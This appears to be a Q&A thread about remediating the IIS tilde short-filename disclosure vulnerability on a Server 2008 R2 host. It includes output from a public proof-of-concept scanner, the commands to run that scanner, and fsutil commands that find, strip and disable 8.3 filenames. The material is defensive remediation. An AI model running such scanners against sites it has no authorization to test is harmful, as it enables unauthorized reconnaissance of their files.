Fixing the IIS tilde vulnerability

Question

One of our IIS servers (IIS 7.5, Server 2008 R2) is apparently "vulnerable" to the tilde Short Filename disclosure issue.

However, I'm having a hard time actually fixing the issue. So far, I've

Disabled 8.3 filenames, stopped the web server, recreated the site directory and started the service again
Added a filter rule for a tilde in the URL:

enter image description here

Added a filter rule for a tilde ANYWHERE:

enter image description here

IISRESET a couple of times
Checked that web.config has the relevant filter rules added

.. but still, I can't get my site to pass the test :

java -jar ~/temp/IIS-ShortName-Scanner-master/IIS_shortname_scanner.jar http://www.example.com

[...SNIP...]

Testing request method: "TRACE" with magic part: "/webresource.axd" ...
Testing request method: "DEBUG" with magic part: "" ...
Testing request method: "OPTIONS" with magic part: "" ...
Testing request method: "GET" with magic part: "" ...
Reliable request method was found = GET
Reliable magic part was found = 
144 requests have been sent to the server:

<<< The target website is vulnerable! >>>

What else do I need to do to resolve this?

EDIT: here's DIR /x which appears to show no 8.3 filenames:

enter image description here

and here's the app pool for the site (all other sites on the server are the same):

enter image description here

EDIT2: Verification there's no 8.3 filenames left:

enter image description here

A quick way to double check if there are any 8.3 names in a directory is `dir /x`. Your site might have symbolic links to directories that still contain auto-generated 8.3 names. — Brian, Feb 25 '15 at 17:29
Installing .NET 4.0 (which is not vulnerable to this exploit) is the other common work around for this issue. Have you tried that yet? — HopelessN00b, Feb 26 '15 at 09:58
.Net 4 is installed, and all application pools on the server are set to use `.NET Framework v4.0.30319` - see screenshot in edit above. — KenD, Feb 26 '15 at 16:12
Wow. Probably grasping at straws here, but are you sure the vulnerability scanner you're using is reliable? Try a different tool, or try to execute the attack manually and see what you see. — HopelessN00b, Feb 26 '15 at 20:22

beatcracker · Accepted Answer · 2015-03-02T20:34:17.393

7

Try to scan for existing short filenames with fsutil:

fsutil 8dot3name scan /s /v E:\inetpub\wwwroot

And strip them if they are found:

fsutil 8dot3name strip /s /v E:\inetpub\wwwroot

Also looking at the log with empty magic part (magic part: ""), I wonder could that be a bug in the POC. This line in config.xml looks like it has extra comma after /webresource.axd:

<entry> key="magicFinalPartList">
 <![CDATA[\a.aspx,\a.asp,/a.aspx,/a.asp,/a.shtml,/a.asmx‌,/a.ashx,/a.config,/a.php,/a.jpg,/webresource.axd,,/a.xxx]]>
</entry>

I've asked dev. via Twitter about it and he responded:

For rare cases in which no extensions were required. But, recently that has caused more problems only! I'll remove it now.

I removed it from the Config file. This was the 2nd complaint so it was the right time for this change.

So, it seems that you're safe now :)

edited Mar 02 '15 at 20:34

answered Mar 01 '15 at 20:53

beatcracker

1,359
8
13

Afraid there's no change - see "EDIT2" in my original post :( – KenD Mar 01 '15 at 21:27
1

Looking at the log with empty magic part (`magic part: ""`), I wonder, could that be a bug in the POC. This line in [config.xml](https://github.com/irsdl/IIS-ShortName-Scanner/blob/master/config.xml) _looks_ like it has extra comma after `/webresource.axd`: `<![CDATA[\a.aspx,\a.asp,/a.aspx,/a.asp,/a.shtml,/a.asmx,/a.ashx,/a.config,/a.php,/a.jpg,/webresource.axd,,/a.xxx]]>` – beatcracker Mar 02 '15 at 15:37
That's **very** interesting - although, looking back through the revisions, that "double comma" has been in the code for a while. Removing it means the test now runs without any obvious error... – KenD Mar 02 '15 at 16:44
Ha, you're safe, see update! – beatcracker Mar 02 '15 at 20:34
All that work and we were safe all along :) Thanks for your help and contacting the dev! – KenD Mar 03 '15 at 08:56

score 1 · Answer 2 · answered Nov 11 '16 at 13:58

also "NOTE: The change to the NtfsDisable8dot3NameCreation registry entry affects only files, folders, and profiles that are created after the change. Files that already exist are not affected. "

Note: Although disabling 8.3 file name creation increases file performance under Windows, some applications (16-bit, 32-bit, or 64-bit) may not be able to find files and directories that have long file names.

score 0 · Answer 3 · answered Jun 16 '21 at 16:15

The best solution is below as we cannot strip after every new deployment.

Test/scan the site for vulnerability with the below link(Install java and run the command to test/scan).

https://github.com/irsdl/IIS-ShortName-Scanner

Command to scan the site:

java -jar iis_shortname_scanner.jar 2 20 https://example.com/

Scan for existing short filenames:

fsutil 8dot3name scan /s /v c:\inetpub\wwwroot

Check 8dot3 name creation is disabled or enabled:

fsutil 8dot3name query C:\Release\SiteRootDocumentPath

If 8dot3 name creation is enabled, use below command to disable:

fsutil 8dot3name set C:\Release\SiteRootDocumentPath 1

8dot3name properties are set to enable 8dot3 name creation for a specified volume (0) or set to disable 8dot3 name creation on the specified volume (1)

Even if you redeploy the code in the site physical(SiteRootDocument) path it won’t create files with short names.

The scan will be passed:)

score 0 · Answer 4 · answered Feb 26 '15 at 04:50

0

Unfortunately the only way to really deal with this is an annoying set of gyrations, depending on your version of windows, disabling the ability to generate 8.3 names.

For your version of Windows:

To disable 8.3 name creation on all NTFS partitions, type fsutil.exe behavior set disable8dot3 1 at an elevated command prompt, and then press Enter.

Source: http://support.microsoft.com/kb/121007

answered Feb 26 '15 at 04:50

Dave Holland

1,898
1
13
17

The article you linked says how to disable 8.3 filename creation, not why it solves the problem. – Michael Hampton Feb 26 '15 at 05:00
I already have disabled 8.3 filenames, and `dir /x` shows no short filenames in the site's directory – KenD Feb 26 '15 at 08:44
Ken, was this the method that you used to do so? – Dave Holland Feb 26 '15 at 16:43
Yeah; I've also seen reference to a registry setting, but the `fsutil` command appear to just set that key for me. – KenD Feb 26 '15 at 23:23

score 0 · Answer 5 · answered Feb 26 '15 at 16:27

I'm not exactly how sure the script works and how your network it setup but how about filtering via something in front of the IIS server (even if it's just a virtual device in a virtual machine)? Namely, you setup an IPS with a rule that specifically drops traffic pertaining to that particular issue?

Fixing the IIS tilde vulnerability

5 Answers5

Linked